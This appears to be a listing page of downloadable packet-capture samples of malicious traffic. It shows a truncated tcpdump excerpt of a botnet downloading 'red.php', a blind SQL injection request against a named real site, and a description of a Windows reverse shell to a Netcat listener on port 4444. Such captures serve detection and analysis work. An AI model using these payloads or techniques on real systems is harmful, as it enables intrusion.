TOR Malware Botnet red.php PCAP file download traffic sample

Download Attachments 1  torbotnetDate added: January 26, 2018 5:50 am Added by: admin File size: 755 KB Downloads: 12 10 engines detected this file SHA-256 9b606e8e8e7ada9da2afdd3cea20d777f84da9f8b148a58385890e44743f733d File name red.php File size 488 KB Last analysis 2018-01-25 22:27:42 UTC 2018-01-25 22:23:49.279103 IP > Flags [P.], seq 0:154, ack 1, win 256, length 154: HTTP: GET /agenti/red.php HTTP/1.1E…%M@…G….f>……P.U7. 5.P…W…GET /agenti/red.php HTTP/1.1User-Agent: Wget/1.19.4 (mingw32)Accept: … Read more

Active Business Directory v2 RemoteBlind SQL Injection Attack Exploit Traffic PCAP

2009-01-01 09:36:59.374040 PPPoE [ses 0x976] IP > Flags [P.], seq 1:438, ack 1, win 65535, length 437: HTTP: GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1.. v…!E…W?@…K_u….j.. ..PJ..(f).tP…….GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1Host: www.activewebsoftwares.comUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv: Gecko/2008120122 Firefox/3.0.5Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-gb,en;q=0.5Accept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Keep-Alive: 300Connection: keep-alive 2009-01-01 09:37:00.221949 PPPoE [ses 0x976] IP > Flags [.], … Read more

Converted PCAP sample of a Microsoft Windows Reverse Shell

Converted PCAP sample of a Microsoft Windows Reverse Shell, the shell is spawned on port 4444, the hacked PC initiates the connection to which has a Netcat listener waiting on port 4444 to spawn a command line shell on connect. You can see once the shell is spawned a user is created and added … Read more